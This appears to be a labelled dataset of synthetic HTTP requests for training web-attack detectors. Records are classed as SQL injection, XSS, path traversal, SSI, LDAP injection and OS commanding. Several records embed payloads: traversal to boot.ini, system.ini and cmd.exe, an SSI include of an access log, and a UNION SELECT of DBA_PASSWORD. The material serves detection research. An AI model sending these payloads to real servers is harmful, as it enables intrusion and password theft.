If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 73
MIME-Version: 2.1
Pragma: oboc=ei2EbgBn
Proxy-Authorization: ledega 1phesBu=nKn6nse
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: http://www.Rte64w9.st/wJn3mEos/ecabea/asO6e/zom1n7.jsp
TE: gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 8.1; ya-lk; rv:2.3.4) Gecko/59906514
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 1.1 www.ars68hi.html, 7.1 36.237.244.148, 6.7 90.136.18.23:9475
Transfer-Encoding: deflate
Upgrade: nueei/2.7, enf/8.5
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49468
Start - Id: 44700
class: PathTransversal
PUT /tsiw6oepeen3saesecaa/3si/sweltuvaze.gif? HTTP/1.1
Content-Length: 339
Content-Language: q0e,e,6ipsL
Content-Encoding: identity
Content-Location: http://www.l7ttm.fr/osna/amnaay/rene/lwtwfen.fgf
Content-MD5: bFVuaG5sc2N0c2xvZHNybg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 06:56:56 GMT
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 189.211.57.202
Connection: close
Accept: video/mpeg;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 04 Apr 07 08:17:15 GMT
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: lnumHot=vabdgrue;cMiuP
From: Eu9rraC@rmprTar.net
If-Modified-Since: Mon, 12 Jan 09 01:26:50 CET
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 2856
MIME-Version: 8.4
Pragma: htmjegse='Edo0'
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: eaky9 2btAl=hHSdo1yo
Range: 2168-,8-1607,73-
Referer: http://www.aatRoE.uk/tdfeohn.tar
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: iyueotusbHb5ro
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2309x0531
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

wnuoufeN=iWxtIAaOG&ediniil=7&tssahhnwheEuh=85021956&siicrbzruNr=/e4si&za815qhisvr37=0247978636&ireao4epcyi=Xots7h&eSnow=jg&vs=88676&fsssn9dio=1ozl7wn&Mj9nTN_uD42B=hknlat&V14@_=doc(  file:///c:/mre/ihggley.xml   )&t5td=oifeila68eRrouys&ueMinr2jxutl4j=sthomey5&oedtiv1lsritP=807&Dgvkd8=xsa2ninincludeiscript-os;boot.ini

End - Id: 44700
Start - Id: 39523
class: SSI
GET /Eeehcifhnrbo/qawffq/e9s1eenhUtw/shlb/Bn/egiarHA.htm?9CTV=657152 HTTP/1.0
Host: 133.194.40.14:5883
Connection: keep-alive
Accept: audio/x-wav;q=0.0, text/xml;q=0.4
Accept-Charset: cp-950, cp-950, hz-gb-2312;q=0.0, euc-jp;q=0.9, windows-874;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: ooain-uma00sto, sguval-wjeesa, eetzn-n;q=0.8, t-sed0nnst;q=0.1
Cache-Control: only-if-cached
Cookie: nDN9=piOth;wbXeP2z280da=qebgoysp;mi0vge6pCVg=h.V6kwf7K0f;tlnoeaoozw1oio=<!--   #include  virtual="/var/log/httpd/access.log"-->
Cookie2: $Version="31"
Date: Tue, 17 Apr 07 05:55:30 CET
ETag: "WUYadImtpEdLAIWZ"
Expect: 100-continue
From: rnwtrioN@eaeth.com
If-Modified-Since: Thu, 24 Dec 09 10:42:27 CET
If-Unmodified-Since: Sat, 03 Nov 07 18:02:24 UTC
If-Match: "O82rgYdRsz.zXwWOLRt"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.9
Pragma: wfn='eF0'
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM bnJsNHJkY281V3VhUmVlbG5uYnNBaHllZXJzemdybWNhdGQ2cmVucHly
Range: 649-,-625813
Referer: /8zseoeW/lclwomm/ttwge5tb.cgi
TE: trailers,gzip
User-Agent: rsr0yiafas (tdPXs8M1EZ; 2tAV72Ws; gucdCU1w)
Via: 7.8 www.nrye.shtml
Transfer-Encoding: deflate
Warning: 371 169.121.60.122 "odtnnnle4TbLdinltnP" "Fri, 09 Jan 09 20:17:43 GMT"
X-Forwarded-For: 81.239.118.138
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39523
Start - Id: 40817
class: SSI
GET /a9RSe.wWxigWg/asr/kPcndNC@0ncj.tiff?itgtsipea=4a+mailesgdivr%28&2dPq76swtat=tfweoa3h&ulwntA=fwes%40&sgn=a3JFmLtAd33&neeltoghshw3=%3C%21--+++%23odbc++++connect%3D%22altl6%2CQuiyra%2Cef9%22+++++++statement%3D%22select+++++*+++++from+++++mltt%22--%3E&TuEM@ypcUiwl=gyg&fsaxosvea=3660326&6o8teb33iefse=2&rhaah8eetRgi=iNoeeEmmfnodht&e2t=eptaee5wt%3Bs+&YPLe4-1.=%27i-t3&LBHO0TcR@documentdM=mtsCtNRFjcc HTTP/1.1
Host: 127.148.230.17
Connection: tsoLrs
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=547
Client-ip: 65.208.97.77
Cookie: hhpo=[
Cookie2: $Version="9"
Date: Mon, 10 May 04 18:29:19 UTC
ETag: W/"whybu@XGd8ZnOdij9"
Expect: zy1Nra
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Apr 07 19:01:23 UTC
Max-Forwards: 6745
MIME-Version: 6.5
Pragma: son='empe1i'
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: NTLM RXJyaWxoc2g2ZGFhbnRubGpub2FhTDJybG9vaGluSHR5d3R0dWI3d3N5
Range: 8-,53016-,755940-70410
Referer: http://GofsOoL.de/t0yTctTe/crcgtn/DemN.conf
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: tlxqUuo/9.3.2.6.8
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 047x242
Via: 7.5 www.iaev.tiff, FTP/4.0 www.epOps.shtml, 2.6 17.167.40.108
Transfer-Encoding: gzip
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40817
Start - Id: 41178
class: SqlInjection
GET /etwAsdrea/5Sm/rfkujlinktelnet3-K4f/WSSR.bin?stg=925994488&NJcGdOu=60&mhtnemaensa=fV3F3zD9&EeuiA4S=73517&8nrc=%28bi%25tsnl4tEegnoap&4metci=iJUJX4x%40u&etTy2ahO=pKV_&E9bKCv6Areplaceo6P=775850595&O3TdH.@R=ut%2F HTTP/1.1
Host: 54.29.128.117
Connection: keep-alive
Accept: video/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, deflate, gzip;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 87.15.160.113
Cookie: mYwreplace92OMawgetyq=eSJ;fQBdfc24Crcpnode=uSaeeoeoHseiun5i;6oeOtih5aa=o7 n
Cookie2: $Version="21"
Date: Sat, 03 Mar 07 10:22:28 CET
ETag: W/"Uu@KUzA.0IwnkVwHL"
Expect: hslny
If-Modified-Since: Fri, 13 Aug 04 02:49:14 CET
If-Unmodified-Since: Wed, 01 Aug 07 11:30:57 CET
If-None-Match: *
If-Range: Sat, 16 Sep 06 23:03:55 CET
Max-Forwards: 4383
MIME-Version: 9.6
Proxy-Authorization: me0i lldsic=km85srx
Authorization: Digest algorithm=MD5
Range: -904358
Referer: /neieneia/Emer5j/u5eeN/cetkbxln.css
TE: chunked;q=0.9,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: 43    or  id>6   or ls_id<507
UA-CPU: MIPS
UA-Pixels: 060x5480
Via: HTTP/2.6 195.184.224.72:151, 8.5 45.236.251.199, s2k/4.4 www.asi7cra.css:2
Transfer-Encoding: gzip
X-Forwarded-For: 99.72.174.214
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41178
Start - Id: 41935
class: SqlInjection
GET /r8RUVeY@MbXDIrbrclaa/dBTUh0/aunwutxxm1eu.asp?Sohsencchnkii=%27union++++select++PASSWORD++++from+DBA_PASSWORD%3B-- HTTP/1.0
Host: 161.195.70.205
Connection: eetdt5m
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: trA-oee, aec-w;q=0.5, mi0ml-sj;q=0.7, mg-riPce, w-a4
Cache-Control: only-if-cached
Client-ip: 167.205.9.192
Cookie: t6=54585;oo8trs4tegx=478;IrtOuqohetrte=a g
Cookie2: $Version="26"
Date: Sun, 21 Dec 08 21:14:05 UTC
ETag: W/"fVRjw.c9SadJ-A7LI2u"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 08 Jul 04 04:43:54 GMT
If-Unmodified-Since: Wed, 10 Dec 08 21:36:51 GMT
If-Match: "h1xAaJiYOZdWVdq"
If-None-Match: *
If-Range: Thu, 08 Jun 06 19:55:45 UTC
Max-Forwards: 64
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: /rsr5dif/0ii7/myun.php3
TE: gzip;q=0.3,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: h7mTU3xLgo http://www.oCaH.net
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: compress
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 648 197.39.167.83 "st7979i6D" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41935
Start - Id: 48058
class: XSS
GET /dl5D07YhsBmu/moOstIoactfspo1hi7/20Ymt/eunuazvkhy7mC0es/eunionailinkSPuUpD/ahA4oc0/daeroqeEiata1/qfF7GLmNA/SPrinputXoJ_.css?gconnectEmdhJj_=rpnzeihtb&htj3s6moio=74831&5llitDi=e9ktHEEwotl0yGt&neeapphsue=%3Cdiv++++style+%3D+++%22++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.itet.com%2Fscript%2FEnohlS9c.mdb%5D%29%3B++%22+++%3E&twsme=ra+e&ipcMerot=302996&gu7ux=aa&tpt=4666799&ulnsnatugepehTj=efs3aeEfq HTTP/1.0
Host: www.cvoa.gov
Connection: close
Accept: application/*;q=0.0, image/*;q=0.5, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, compress
Accept-Language: hseshns-ttr;q=0.0, risc-Onlai;q=0.0
Cache-Control: min-fresh=60969
Client-ip: 199.91.154.140
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Cookie2: $Version="9"
Date: Mon, 19 Mar 07 05:27:45 CET
ETag: W/"pMhTYPGtA6ex8Op2RXC"
If-Modified-Since: Wed, 12 Jul 06 16:50:46 UTC
If-Match: *
If-None-Match: "nxswnkQNfG669Sdi1"
Max-Forwards: 5451
MIME-Version: 9.5
Proxy-Authorization: Yean xazroh=heTobre
Authorization: NTLM MWFoMzQzc21kYWx5ZG82dGFIc09mbmV0ZUhnZWRjZHRneWVldXVuMw==
Referer: /Redt/92ie6/2haermCt.php3
User-Agent: eReiiaai/3.6.5.6.8
UA-CPU: PowerPC
UA-Pixels: 8331x5573
Transfer-Encoding: deflate
Upgrade: edtthr/9.5, Yast/6.8, ti2epi/5.7, tgb0/4.2

null

End - Id: 48058
Start - Id: 44241
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 161.122.89.227:80
Connection: miDy
Accept: */*
Accept-Charset: utf-7;q=0.9, euc-kr;q=0.7, x-mac-icelandic;q=0.7, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: ife-rqo, nrhzm-h;q=0.5, d-o3t;q=0.2
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: joorctkjob8rc=aeywst<>>i3ssall9~;rnotiefeopLe=1ngecRavs
Cookie2: $Version="9"
Date: Tue, 25 Jul 06 18:09:41 CET
ETag: "-8T0kbq_jilGiD3"
Expect: uNcro
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: Sat, 27 Feb 10 22:18:02 GMT
Max-Forwards: 5
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: Digest nonce
Range: 9-
Referer: http://www.sdvudo.de/uaiceL/iaefhusD.bin
TE: trailers,chunked,chunked
Trailer: Proxy-Authorization
User-Agent: aX2s2o/7.1.4.3
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: compress
Upgrade: 0sp/8.6, gthorA/5.1, rolgoc/8.9, ueeiT/5.3, ylot/4.6
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 5593784151230752616
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44241
Start - Id: 38455
class: LdapInjection
GET /npe/n3HEe9GOdILjMWCBcZY/hrsrsXwrmxkEh/3340BJV/nZ.mreplaceuT/accepty6./ieX-Y8-zvIUHpab.html?oonfBxht=dphi6khna1itm&gehtminbirtrhIc=Br%29%28+++%7C+%28Ozwo2%3D*%29&wccaM3=956&ihmn7entmzagf8=84&hjdeboSeec=itoo&TzrSnem=egroup+byOoeio&kdZ-=8497507684&cdepa5tmartrLn=dCjG8QkiVj&oAea1vroo9asto=wh1ndiframeeieu&6dorxuwlqi=ni%7E%27as+&9tfhnd9ln8Cels=r4UW7bwoi&3eI63Ve6pndhrfr=25173&lrsZr6eBnidnve=tqta+entks&whacaedaeGtarlo=86 HTTP/1.1
Host: www.aoQo8dt.be
Connection: easanSw
Accept: */*
Accept-Charset: x-mac-arabic, windows-1254;q=0.6, windows-874, euc-tw;q=0.1, windows-1253
Accept-Encoding: 
Accept-Language: rvo-ybi7;q=0.3, zh-oftiedmf;q=0.8, 4nwsttic-mtt3dft
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Tue, 07 Dec 04 10:18:31 UTC
ETag: W/"6u_ns_BxBlvp3Ise"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Tue, 14 Jul 09 01:11:48 GMT
If-Unmodified-Since: Wed, 22 Dec 04 13:30:51 UTC
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: *
If-Range: "viw1wKSEZ6Drswu3r"
Max-Forwards: 921
MIME-Version: 3.3
Pragma: o3autEen=elpo
Proxy-Authorization: Digest realm
Authorization: NTLM bWU4OGNvNnNOOXJ1d3FOOW9oYXFmcjNvcm1hb3FlbGMzYXRhZWRydGV0M0E=
Range: 283-,-1,-786
Referer: /hUntitrw/rwnl.php4
TE: trailers
Trailer: If-Match
User-Agent: eudF43d42n (upDKNlS6ce; nrysbZG)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 2.4 www.oaneeeyt.gif:88210, refeaA/2.6 www.iOgN.html
Transfer-Encoding: identity
Upgrade: Sao/2.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38455
Start - Id: 45693
class: PathTransversal
GET /z6acrDNdU2NYAaIN/chnnb8tenesobeestose/biey0-DEpQ78UzSoEF/tU5qzs8YYKnSXW/Zdfeie.jpg?Txltdso=lcw4sd&auermobNnoaha=8&4g9E=tY4MlV&ve6snwnumrStged=0966&oewo=7aeiec1n%5C&rs=3625569&8NTu=trk&zI=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&0PAz1rz1pfY=vtnr5aeegakeaheh&ppseEDsdyscmw=402&E9i0exntejhn2DE=eLFrZH&tDseupnr=i1%40Mi HTTP/1.0
Host: 215.73.211.244
Connection: close
Accept: image/gif, text/html;q=0.6, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: Xs-luh, en5iytW-rl, Oonmsycx-r4oleh, penicaE-edo
Cache-Control: min-fresh=0506
Client-ip: 24.162.161.227
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="2"
Date: Wed, 26 Oct 05 13:57:39 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: 100-continue
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 10 Jun 05 04:46:25 CET
If-Match: *
If-None-Match: *
If-Range: "uI3J2d3rGW5NAp2fMVa-"
Max-Forwards: 1
MIME-Version: 5.2
Pragma: mCsstzas='lts'
Proxy-Authorization: Basic eGdyblIyQUU6bnRTZQ==
Authorization: NTLM Y3ZjZWhsZGVhdWNoZWVhYWFzZjNwb1hpZXdqbGVsM2lhZUN0bmZUZXJpYXAyeTE=
Range: -934,-807,-703421
Referer: /agk3yfer/niat/hpoEager.nsf
TE: trailers,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 2.0; S0-ee; rv:5.9.6) Gecko/38043205
UA-CPU: Sparc
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: HTTP/1.3 www.eapop.jpg:65, mc3/1.1 157.220.38.46, 1.6 www.tna7l.gif
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45693
Start - Id: 46552
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: www.eidh1eYwnp.org
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, ks_c_5601-1987;q=0.3, windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 249.247.50.249
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="88"
Date: Sat, 16 Feb 08 14:51:03 GMT
ETag: W/"RGdTeC-Sdkntwg."
Expect: ae3drp=nhzi;ceie=srseutik
From: ns7rogjc@npah.it
If-Modified-Since: Fri, 27 Mar 09 11:13:26 GMT
If-Unmodified-Since: Tue, 12 Feb 08 17:21:35 GMT
If-Match: "xIRzK16jp7t-YVqterIT"
If-None-Match: *
If-Range: *
Max-Forwards: 6217
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: 2794-2,-4107
Referer: http://www.rs3gfarh.st/cd1p/iaUehft/gnssOoh/brnh.mpg
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 9.1; ie-fn; rv:2.8.8) Gecko/41182452
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: 3.0 www.uoxet0.js:4728, 9.8 143.28.202.87
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46552
Start - Id: 45683
class: PathTransversal
GET /yeZ_3NDLu0U-o/libs6XzJa9K2.Ub/entansxieommcSs/sFVikYh4/r4Z88VxlMOa.5.OkE7/tge7gsdi/i8GkpBEPn75s/tg/mk7NgWFVPWgAfzC8U-Ws.js?AaH1hhtdlet=d0albejeuadlpet&03YPdcN=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fchleic%2Fliesleic%2Fndserendti%2Felerilsi.php&afnYticr4ee=reO&nRlodu=zce&vlnyfor=a10%25ui%29 HTTP/1.1
Host: 167.197.178.100
Connection: close
Accept: image/*, video/*
Accept-Charset: iso-8859-6;q=0.4, isiri-3342, iso-2022-jp;q=0.5, iso-8859-7, cp-932
Accept-Encoding: *;q=0.9
Accept-Language: oin1d-ei;q=0.9
Cache-Control: max-age=36383
Client-ip: 10.24.0.201
Cookie: NUsystemOOj26PY=<t+e;jhFZvuX5Mformexec=bKfsrM3lxtermi6C<a;onhahtf50t7es=o;bad1wssido=0i0t ;rlatuosgRu=5;bomIl=012
Cookie2: $Version="731"
Date: Mon, 12 Jun 06 08:32:49 CET
ETag: "oITd6gpcm.9INtKUBAA"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Thu, 15 Nov 07 02:26:29 CET
If-Unmodified-Since: Tue, 11 May 04 13:41:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 14:57:47 GMT
Max-Forwards: 26
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: /paaosl/eo9fr9cg/vdibni/sica/89Ynlisn.gif
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 3.3; tI-to; rv:4.2.4) Gecko/90706406
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 488x430
Via: 3.1 161.47.167.37, 3.9 www.riaxe5er.html
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45683
Start - Id: 37121
class: LdapInjection
GET /tf2b.mMFsEU/Gsttaienbes/sod/rw1.RH1E0mt.OmLyy9-/mWbody.RThavingstdinq7openoptdHQ/LSZ.4xterm2FVDcQ/se4oWrdo/avo/hihu1L/BmnCW/buBkmdiibu2dB-YLC.aspx?tPel=%29+%28++%7C+%28displayName%3Dhad*%29+%28name+++%3Dhad*%29%28+++mail%3Dhad*%29 HTTP/1.1
Host: www.0mwwibM.be:80
Connection: 2Rits
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: identity, identity
Accept-Language: c1s0-0DDso;q=0.1, utb8emdy-aM4vnpzI;q=0.2, w-esy;q=0.7, siuieeaa-h, hTdtmrt-icneocp
Cache-Control: min-fresh=39
Client-ip: 55.97.57.216
Cookie: q484DL=qiajdsIydto&mh;eiNxohr7TrnlCl=23;rFUroosgt8=erzaagr4ohuyR;tnidOirUrAtwys=rEIpF
Cookie2: $Version="74"
Date: Mon, 04 Aug 08 02:38:04 CET
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Thu, 09 Aug 07 18:16:20 UTC
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: "lr0blj99nM@6wpEN20Rp"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: ntaf gi6ici=mesubRv3
Range: -5173
Referer: /hwemo/35ya/aiaM/fWewp.png
TE: trailers
Trailer: Accept-Language
User-Agent: hdaefaehN/2.5
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/5.1 www.ydbno6Sg.css, 1.6 20.94.179.45, 8.9 53.204.116.100
Transfer-Encoding: compress
Upgrade: tRvc9/2.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37121
Start - Id: 35329
class: SqlInjection
GET /E8/im_Za4LI.dll?nugtnqKet=+r&dVtSs=t5v7ZV4E&tdmwss2ii=5msfUL&iafnrh90oe=eD_xY5L&wn=elotrprhnttgn&aVwrsehnc=%27+%29+++UNION++++ALL+++++SELECT++tiv+++%2C+++++aisdp+++%2C++oeOnettb++++FROM++++c3+WHERE+++tey+++++NOT+++IN+++++%28++++%27ledmoeO%27%29+AND+++++hiietlp+++++NOT++IN+++%28++++%27tshji5tss%27+++%29+++++AND++%27%27%3D+%27 HTTP/1.1
Host: www.ajFatne6H.net
Connection: close
Accept: application/x-tar;q=0.4, image/gif, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: afteb-be
Cache-Control: min-fresh=301
Client-ip: 108.43.219.139
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="139"
Date: Tue, 09 Mar 04 07:23:20 CET
ETag: W/"Vwc@cyCG1aygn@1E8xdw"
Expect: 100-continue
From: atozRhO@AwAlyrse.it
If-Modified-Since: Sat, 24 Dec 05 09:15:00 CET
If-Unmodified-Since: Sat, 27 Aug 05 21:39:06 CET
If-Match: "KvFFr2cdC@cpzIJyO_gF"
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 7698
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Birq o387tme=aaaoeew
Range: -22612,-1029,90558-
Referer: /ideenel/7eso/yodshm/srafl/2sBDnnln.swf
TE: trailers
Trailer: Via
User-Agent: Mozilla/9.2 (Windows; U; Win98 7.6; ac-sa; rv:9.0.4) Gecko/54378357
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/5.5 www.7qfsea.htm
Transfer-Encoding: fosip
Upgrade: see/8.7, jebi/8.0
Warning: 635 237.151.216.13:8 "tstkg" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 31934378445962410
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35329
Start - Id: 42771
class: SqlInjection
PUT /nx3L@nEUMu79yzbtggP/gh/fSdtr8xPmQ6iT49OPJiq/r7naisaloss/ABRaS69IAGd5/sol8asuppeOn/ryeoassfaert/uegoIxwt-68b/nTsZPVgq/oZeSuqa9j1bqA/fhBt.shtml? HTTP/1.1
Content-Length: 251
Content-Language: jierad,sexk,ucfcaae
Content-Encoding: identity
